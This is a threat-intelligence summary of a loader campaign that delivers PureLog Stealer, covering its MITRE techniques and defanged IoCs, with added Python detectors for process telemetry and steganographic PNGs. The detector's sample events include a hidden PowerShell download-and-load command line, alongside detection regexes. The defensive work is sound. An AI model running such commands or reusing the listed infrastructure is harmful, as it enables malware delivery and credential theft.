Stealth in Layers: Unmasking the Loader used in Targeted Email Campaigns

CRIL identified a commodity loader used by multiple threat actors in targeted email campaigns that primarily impacted Manufacturing and Government organizations in Italy, Finland, and Saudi Arabia. The multi-stage, largely fileless infection chain uses weaponized Office documents (CVE-2017-11882), steganographic PNGs hosted on Archive.org, trojanized TaskScheduler assemblies, reflective loading and process hollowing to deliver payloads such as PureLog Stealer to a C2 at 38.49.210[.]241. #PureLogStealer #TaskScheduler

Keypoints

  • CRIL tracked a commodity loader shared across multiple high-capability threat actors delivering RATs and infostealers to targeted sectors, especially Manufacturing and Government in Europe and the Middle East.
  • Initial infections used targeted phishing with RAR/ZIP attachments and weaponized Office documents exploiting CVE-2017-11882, as well as malicious SVG and LNK-based archives.
  • A unified four-stage, largely fileless execution chain includes obfuscated JavaScript, hidden PowerShell retrieval, steganographic PNG extraction, reflective .NET loading, trojanized TaskScheduler assembly, and process hollowing into RegAsm/AddInProcess32.
  • Steganography and trojanization of open-source libraries were used to evade detection: payloads were embedded in PNGs hosted on legitimate services (Archive.org, Pixeldrain) and malicious functions appended to trusted .NET libraries.
  • The final payload observed in analyzed samples was PureLog Stealer, which exfiltrates browser credentials, crypto wallet data, email and VPN credentials, and system telemetry to C2 38.49.210[.]241.
  • A novel UAC bypass was noted where the malware monitors process creation and opportunistically triggers UAC prompts to obtain elevated PowerShell execution through user approval. Note that this still depends on the user accepting the consent prompt; it is prompt abuse rather than a silent bypass of the UAC check.

MITRE Techniques

  • [T1566.001] Phishing: Spearphishing Attachment – Targeted phishing emails with malicious attachments masquerading as Purchase Orders (‘masquerading as legitimate Purchase Order communications from business partners’).
  • [T1203] Exploitation for Client Execution – Use of an exploit for CVE-2017-11882 in Microsoft Equation Editor to weaponize Office documents (‘exploiting CVE-2017-11882’). This is a client-side document exploit, not an attack on an internet-facing service, so T1190 does not apply.
  • [T1204.002] User Execution: Malicious File – Victims open JavaScript, VBScript, or LNK files delivered in archives (‘Extraction of the RAR archive reveals a first-stage malicious JavaScript payload, PO No 602450.js’).
  • [T1059.007] Command and Scripting Interpreter: JavaScript – Heavily obfuscated JavaScript reconstructs strings and spawns PowerShell to retrieve second-stage payloads (‘The de-obfuscated JavaScript creates a hidden PowerShell process’).
  • [T1059.001] Command and Scripting Interpreter: PowerShell – Hidden PowerShell instance retrieves steganographic payloads and decodes assemblies for reflective loading (‘The decoded PowerShell script functions as a second-stage loader, retrieving a malicious PNG file’).
  • [T1047] Windows Management Instrumentation – WMI objects used to spawn hidden PowerShell processes (‘creates a hidden PowerShell process using WMI objects (winmgmts:root\cimv2)’). Because the process is created through Win32_Process, the parent recorded in process-creation telemetry is WmiPrvSE.exe rather than the script host.
  • [T1027] Obfuscated Files or Information – Multi-layer obfuscation including base64 and string manipulation used throughout the chain (‘Multi-layer obfuscation using base64 encoding and string manipulation’).
  • [T1027.003] Steganography – Payloads steganographically embedded in PNG images hosted on Archive.org and other services (‘malicious payload hidden within PNG image files’).
  • [T1620] Reflective Code Loading – .NET assembly loaded reflectively in memory to avoid disk writes (‘reflected in memory via Reflection.Assembly::Load’).
  • [T1055.012] Process Injection: Process Hollowing – Loader creates a suspended RegAsm.exe and injects the decoded payload into its memory (‘creates a new suspended RegAsm.exe process and injects the decoded payload into its memory space’).
  • [T1036.005] Masquerading: Match Legitimate Name or Location – Execution through legitimate Windows utilities and trojanized libraries to blend with normal activity (‘weaponizing the legitimate open-source TaskScheduler library’ and use of RegAsm/AddInProcess32).
  • [T1548.002] Abuse Elevation Control Mechanism: Bypass User Account Control – UAC prompt abuse that monitors process creation and triggers prompts to gain elevated PowerShell execution; elevation still requires the user to approve the prompt (‘monitors process creation events and opportunistically triggered UAC prompts’).
  • [T1497.003] Virtualization/Sandbox Evasion: Time-Based Evasion – Use of a 5-second sleep delay to evade automated sandbox analysis (‘with a 5-second sleep delay’).
  • [T1552.001] Unsecured Credentials: Credentials In Files – Extraction of credentials from stored files and browser databases (‘Extraction of credentials from browser databases and configuration files’).
  • [T1555.003] Credentials from Password Stores: Credentials from Web Browsers – Harvesting saved passwords, cookies, and tokens from multiple browser families (‘Data harvested from a wide range of Chromium-based browsers… Firefox-based browsers’).
  • [T1555] Credentials from Password Stores – Extraction from password manager applications and browser-based password stores (‘Extraction of credentials from password manager applications’).
  • [T1082] System Information Discovery – Collection of hardware, OS, and network information for fingerprinting (‘Collection of hardware, OS, and network information’).
  • [T1518.001] Security Software Discovery – Enumeration of installed antivirus and security products (‘Enumeration of installed antivirus products’).
  • [T1005] Data from Local System – Collection of cryptocurrency wallets, VPN configs, and email data (‘Collection of cryptocurrency wallets, VPN configs, and email data’).
  • [T1114] Email Collection – Harvesting email credentials and configurations from desktop email clients (‘Harvesting email credentials and configurations from email clients’).
  • [T1102] Web Service – Abuse of Archive.org and other web services to host steganographic payloads (‘retrieving a malicious PNG file from Archive.org’).
  • [T1041] Exfiltration Over C2 Channel – Exfiltration of stolen data to C2 infrastructure at 38.49.210[.]241 (‘Data exfiltration to C2 server at 38.49.210[.]241’).
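The execution chain mapped above (script host, WMI-spawned hidden PowerShell, a fetch from a public staging host, Reflection.Assembly::Load, then a RegAsm.exe or AddInProcess32.exe child started with no arguments as a hollowing target) is a sequence a detection engineer can test for directly in process-creation telemetry. The following is an added example, not code from the Cyble write-up: a small detector over Sysmon-style process-creation records. The events, PIDs and the archive.org item path are constructed for illustration; only the binary names, the staging hosts and the MSI_PRO_with_b64.png carrier name come from the report.

```python
"""Behavioural detection for the loader chain over constructed process-creation events.

Added example (not from the original report). Event records mimic the fields of a
Sysmon Event ID 1 / EDR process-start record; all sample values are constructed.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str
    cmdline: str
    parent_pid: int
    parent_image: str


def image_name(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def args_after_image(cmdline: str) -> str:
    """Argument string following the executable token ("" when started with no args)."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[end + 1:].strip() if end != -1 else ""
    parts = s.split(None, 1)
    return parts[1].strip() if len(parts) > 1 else ""


# PowerShell started with a hidden window or an encoded command
HIDDEN_WINDOW = re.compile(r"-(?:w|win|windowstyle)\s+(?:hidden|1)\b", re.I)
ENCODED_CMD = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I)
REFLECTIVE_LOAD = re.compile(r"Reflection\.Assembly\]?::Load", re.I)
STAGING_HOSTS = re.compile(r"archive\.org|pixeldrain\.com", re.I)

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
WMI_PROVIDER_HOST = "wmiprvse.exe"          # parent of Win32_Process.Create children
HOLLOW_TARGETS = {"regasm.exe", "addinprocess32.exe"}


def detect(events):
    """Return (pid, rule_id) pairs for events matching the loader's behaviour."""
    findings = []
    for e in events:
        img = image_name(e.image)
        parent = image_name(e.parent_image)
        if img == "powershell.exe":
            spawned_by_stager = parent in SCRIPT_HOSTS or parent == WMI_PROVIDER_HOST
            if spawned_by_stager and (HIDDEN_WINDOW.search(e.cmdline) or ENCODED_CMD.search(e.cmdline)):
                findings.append((e.pid, "ps_hidden_from_script_or_wmi"))
            if REFLECTIVE_LOAD.search(e.cmdline):
                findings.append((e.pid, "ps_reflective_assembly_load"))
            if STAGING_HOSTS.search(e.cmdline):
                findings.append((e.pid, "ps_fetch_from_staging_host"))
        # A hollowing target is launched suspended with no arguments; legitimate
        # RegAsm/AddInProcess32 use carries an assembly path or pipe GUIDs.
        if img in HOLLOW_TARGETS and parent == "powershell.exe" and args_after_image(e.cmdline) == "":
            findings.append((e.pid, "hollow_target_no_args"))
    return findings


def loader_chain_pids(events):
    """PIDs of PowerShell processes that triggered a PowerShell rule and parented a hollow target."""
    hits = detect(events)
    ps_pids = {pid for pid, rule in hits if rule.startswith("ps_")}
    hollow_parents = {e.parent_pid for e in events if (e.pid, "hollow_target_no_args") in hits}
    return sorted(ps_pids & hollow_parents)


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
REGASM = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

# Constructed sample telemetry: one loader chain plus a benign admin session.
SAMPLE_EVENTS = [
    ProcEvent(1001, r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\u\Downloads\PO No 602450.js"', 900, r"C:\Windows\explorer.exe"),
    # Spawned via winmgmts Win32_Process.Create, so the parent is WmiPrvSE.exe. URL item path is made up.
    ProcEvent(1002, PS,
              'powershell.exe -w hidden -ep bypass -c "$d=(New-Object Net.WebClient).DownloadData('
              "'https://archive.org/download/EXAMPLE/MSI_PRO_with_b64.png');"
              '[System.Reflection.Assembly]::Load($a)"', 640, r"C:\Windows\System32\wbem\WmiPrvSE.exe"),
    ProcEvent(1003, REGASM, f'"{REGASM}"', 1002, PS),
    ProcEvent(2001, PS, "powershell.exe -NoProfile", 900, r"C:\Windows\explorer.exe"),
    ProcEvent(2002, REGASM, r"RegAsm.exe /codebase C:\app\Interop.dll", 2001, PS),
]

if __name__ == "__main__":
    for pid, rule in detect(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}")
    print("loader chains rooted at PowerShell pids:", loader_chain_pids(SAMPLE_EVENTS))
```

The no-argument check on the hollowing target is the highest-signal rule here: RegAsm.exe with an empty command line has no legitimate purpose, while the PowerShell rules on their own will fire on some admin tooling and should be used for correlation rather than alerting alone.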

Indicators of Compromise

  • [SHA-256] Sample and payload hashes – c1322b21eb3f300a7ab0f435d6bcf6941fd0fbd58b02f7af797af464c920040a, 5c0e3209559f83788275b73ac3bcc61867ece6922afabe3ac672240c1c46b1d3, and 4 more hashes.
  • [URLs] Malicious hosting and payload retrieval – hxxp://192[.]3[.]101[.]161/zeus/ConvertedFile[.]txt, hxxps://pixeldrain[.]com/api/file/7B3Gowyz, and 2 more Archive.org PNG URLs.
  • [IP Address] Command-and-control server – 38.49.210[.]241 (PureLog Stealer C2).
  • [File names] Malicious attachments and loader artifacts – PO No 602450.rar, PO No 602450.js, and Microsoft.Win32.TaskScheduler.dll (trojanized library).
  • [Binary/process names] Living-off-the-land binaries abused for execution – RegAsm.exe, AddInProcess32.exe (used for process hollowing and payload execution).
  • [File types] Steganographic payload carriers – PNG files hosted on Archive.org (e.g., MSI_PRO_with_b64[.]png) used to hide base64-encoded .NET assemblies.
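The carrier IoC above (a PNG hiding a base64-encoded .NET assembly) can be triaged without the loader: walk the PNG chunk structure, look for long base64 runs in chunk payloads, in the inflated IDAT stream and in any bytes trailing IEND, and keep the ones that decode to an MZ/PE image. The following is an added example, not code from the report or the loader: the exact embedding position used by this family is not stated on the page, so the scanner checks every location generically, and the sample carrier and the PE stub it hides are constructed for the test.

```python
"""Triage scanner for PNG files carrying a base64-encoded PE/.NET assembly.

Added example (not from the original report). The carrier built by
build_sample_png() is constructed; the embedding locations are assumptions.
"""
import base64
import re
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# 64+ base64 characters with optional padding: short runs are common in normal text chunks
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{64,}={0,2}")


def png_chunks(data: bytes):
    """Yield (type, payload) for each chunk, then ("TAIL", bytes after IEND). CRCs are not checked."""
    if data[:8] != PNG_SIG:
        raise ValueError("not a PNG")
    pos = 8
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        yield ctype, data[pos + 8:pos + 8 + length]
        pos += 12 + length            # length + type + payload + CRC
        if ctype == b"IEND":
            break
    yield b"TAIL", data[pos:]


def looks_like_pe(blob: bytes) -> bool:
    """MZ header whose e_lfanew points at a PE signature."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    return blob[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def _scan(label: str, blob: bytes, found: list) -> None:
    for m in B64_RUN.finditer(blob):
        try:
            decoded = base64.b64decode(m.group(0), validate=True)
        except ValueError:            # binascii.Error: bad length or stray padding
            continue
        if looks_like_pe(decoded):
            found.append((label, decoded))


def find_embedded_assemblies(data: bytes):
    """Return (location, decoded_pe_bytes) for every base64 run that decodes to a PE image."""
    found, idat = [], []
    for ctype, payload in png_chunks(data):
        label = ctype.decode("latin-1")
        _scan(label, payload, found)
        if ctype == b"IDAT":
            idat.append(payload)
    try:                              # payload may also be text inside the pixel stream
        _scan("IDAT(inflated)", zlib.decompress(b"".join(idat)), found)
    except zlib.error:
        pass
    return found


def fake_pe() -> bytes:
    """Constructed MZ/PE header stub (not a real assembly), enough to exercise the checks."""
    stub = bytearray(0x100)
    stub[:2] = b"MZ"
    struct.pack_into("<I", stub, 0x3C, 0x80)
    stub[0x80:0x84] = b"PE\0\0"
    return bytes(stub)


def build_sample_png(assembly: bytes) -> bytes:
    """Constructed carrier: a 1x1 PNG with the base64 payload in a tEXt chunk and after IEND."""
    def chunk(ctype: bytes, payload: bytes) -> bytes:
        crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
        return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)

    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)     # 1x1, 8-bit RGB
    idat = zlib.compress(b"\x00\xff\xff\xff")                # filter byte + one white pixel
    b64 = base64.b64encode(assembly)
    return (PNG_SIG + chunk(b"IHDR", ihdr) + chunk(b"IDAT", idat)
            + chunk(b"tEXt", b"Comment\x00" + b64) + chunk(b"IEND", b"") + b64)


if __name__ == "__main__":
    for where, pe in find_embedded_assemblies(build_sample_png(fake_pe())):
        print(f"embedded PE image ({len(pe)} bytes) found in {where}")
```

On a real carrier, run the same function over the downloaded PNG and hand any decoded image to a .NET-aware analyser; a hit in the TAIL or a tEXt chunk means the image renders normally while still carrying the assembly, which is why hash- or size-based image allowlists do not catch it.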


Read more: https://cyble.com/blog/stealth-in-layers-unmasking-loader-in-targeted-email-campaigns/